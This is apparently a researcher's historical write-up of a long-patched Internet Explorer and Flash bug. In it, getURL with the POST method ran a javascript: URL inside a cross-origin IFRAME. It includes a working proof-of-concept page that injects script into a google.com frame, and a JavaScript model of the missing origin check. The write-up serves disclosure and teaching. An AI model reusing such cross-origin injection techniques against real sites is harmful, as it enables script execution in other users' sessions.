This one surprised me. I noticed that Flash’s getURL() function, when called with the "POST" method and a javascript: URL as the target, could execute script inside an IFRAME on a different domain. The trick relies on Flash passing the javascript URL to the named target frame using a POST navigation, which IE’s engine would then execute in the context of that frame.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>xDomain using getURL from Flash with POST Method</TITLE></HEAD>
<BODY>
<FONT FACE="Verdana" SIZE="2">
xDomain using getURL from Flash <U>with POST Method</U>. Works also on IE7. We have an IFRAME called "myTarget" and a .swf file that does this:<BR><BR>
Usage: getURL (URL, TARGET, METHOD)<BR>
<B>getURL("javascript:anyCode()", "myTarget", "POST");</B><BR><BR>
So the javascript URL works inside an IFRAME that is on a different domain. :(<BR><BR>
</FONT>

<object ID="daFlash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="flashtest.swf"/></object>
<IFRAME NAME="myTarget" ID="myTargetID" WIDTH="400" HEIGHT="200" SRC="http://www.google.com/"></IFRAME>


<SCRIPT LANGUAGE="JavaScript">
function loadTrickyFlash(){
	//	Make sure that the Flash is loaded before writing variables.
	if (document.all.daFlash.readyState==4){
		document.all.daFlash.setVariable('URL','javascript:void(document.body.insertAdjacentHTML("afterBegin","<BR><BR><H1>I shouldn\'t be here :(</H1>"));alert(document.body.innerText)');
		document.all.daFlash.setVariable('TARGET','myTarget');
		//	Because the .swf is waiting for those variables, as soon as it receives them it will do a getURL with those values
		//	using the POST method. If we try with GET, it won't work.
		//	This is the line of code that the Flash runs: getURL(URL [Javascript], TARGET [The IFRAME], "POST");
	}
	else setTimeout('loadTrickyFlash()',100);
}
//	Wait onload event from the IFRAME. In my opinion, this shouldn't be possible.
//	An IFRAME should be completely isolated from the main document.
document.all.myTargetID.attachEvent('onload', loadTrickyFlash);
</SCRIPT>
</BODY>
</HTML>

The getURL() function in Flash ActionScript accepts a method parameter (GET or POST). When the method is POST, Flash hands the navigation to the browser through a different path than with GET, and the browser's frame-targeting logic would then execute the javascript: URL inside the named target, even when that target was a cross-origin IFRAME. GET did not reproduce the issue, which points to a difference in how the two navigation paths were processed. The original entry also included compiled Flash artifacts (.fla/.swf), which are not reproduced here.
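To make the missing check concrete, here is an added example (my own illustration, not code from the original record or from Flash or IE) that models the decision a browser has to make when something asks it to navigate a named frame to a javascript: URL. It compares a hardened check, which ignores the HTTP method and only asks whether the requesting document and the target frame share an origin, with a flawed variant that applies the check on GET but not on POST. The function names (parseOrigin, resolveTarget, canNavigate, legacyCanNavigate), the frame objects and the sample origin are assumptions made for this illustration.

```javascript
// Added example, not code from the original post: a small model of the
// frame-targeting check a browser must apply when a plugin (or anything else)
// asks it to navigate a named frame to a javascript: URL. The function names
// (parseOrigin, resolveTarget, canNavigate, legacyCanNavigate) and the frame
// objects are assumptions made for this illustration, not a real browser API.

const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Reduce a document URL to its origin (scheme, host, port) with default
// ports filled in, so "http://host/" and "http://host:80/" compare equal.
function parseOrigin(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return `${u.protocol}//${u.hostname}:${port}`;
}

// javascript: URLs do not load a document; they run script inside the
// target frame's existing document, so they are the case that needs an
// origin check. Match case-insensitively and ignore leading whitespace.
function isScriptUrl(urlString) {
  return /^\s*javascript:/i.test(urlString);
}

// Look up a frame by its NAME attribute, the way getURL's TARGET is resolved.
function resolveTarget(frames, name) {
  return frames.find((f) => f.name === name) || null;
}

// Hardened check: a javascript: navigation into a named frame is allowed only
// when the requesting document and the frame's current document share an
// origin. The HTTP method is deliberately not consulted: the decision must be
// identical for GET and POST, which is exactly what the original bug got wrong.
function canNavigate({ source, frames, target, url }) {
  const frame = resolveTarget(frames, target);
  if (!frame) {
    return { allowed: false, reason: "no frame named " + target };
  }
  if (!isScriptUrl(url)) {
    // Ordinary URL: the frame may be navigated; the new document gets its
    // own origin and the requester gains no access to its contents.
    return { allowed: true, reason: "document load" };
  }
  const sameOrigin = parseOrigin(source) === parseOrigin(frame.src);
  return sameOrigin
    ? { allowed: true, reason: "same-origin script URL" }
    : { allowed: false, reason: "cross-origin script URL blocked" };
}

// Flawed variant for contrast: models a navigation path that applies the
// origin check on GET but forgets it on POST. With this logic the scenario
// described in the post is allowed exactly when the method is "POST".
function legacyCanNavigate({ source, frames, target, url, method }) {
  if (method === "GET") {
    return canNavigate({ source, frames, target, url });
  }
  const frame = resolveTarget(frames, target);
  return frame
    ? { allowed: true, reason: "POST path: origin check skipped" }
    : { allowed: false, reason: "no frame named " + target };
}

// Constructed sample input mirroring the PoC: a page on one origin holding an
// IFRAME named "myTarget" whose document comes from a different origin.
const SAMPLE_FRAMES = [{ name: "myTarget", src: "http://www.google.com/" }];
const SAMPLE_PAGE = "http://poc.example/xdomain.html"; // constructed placeholder origin
const SAMPLE_URL = "javascript:alert(document.body.innerText)";

// Run both checks for GET and POST and return the four decisions.
function demo() {
  const request = (method) => ({
    source: SAMPLE_PAGE, frames: SAMPLE_FRAMES, target: "myTarget", url: SAMPLE_URL, method,
  });
  const hardened = ["GET", "POST"].map((m) => canNavigate(request(m)));
  const flawed = ["GET", "POST"].map((m) => legacyCanNavigate(request(m)));
  return { hardened, flawed };
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of the model is the signature of canNavigate: the method is not an input to the origin decision at all, so there is no second code path that can forget the check. Running demo() shows the hardened check denying the script URL for both methods while the flawed variant denies GET and allows POST, which is the asymmetry the post describes.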

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.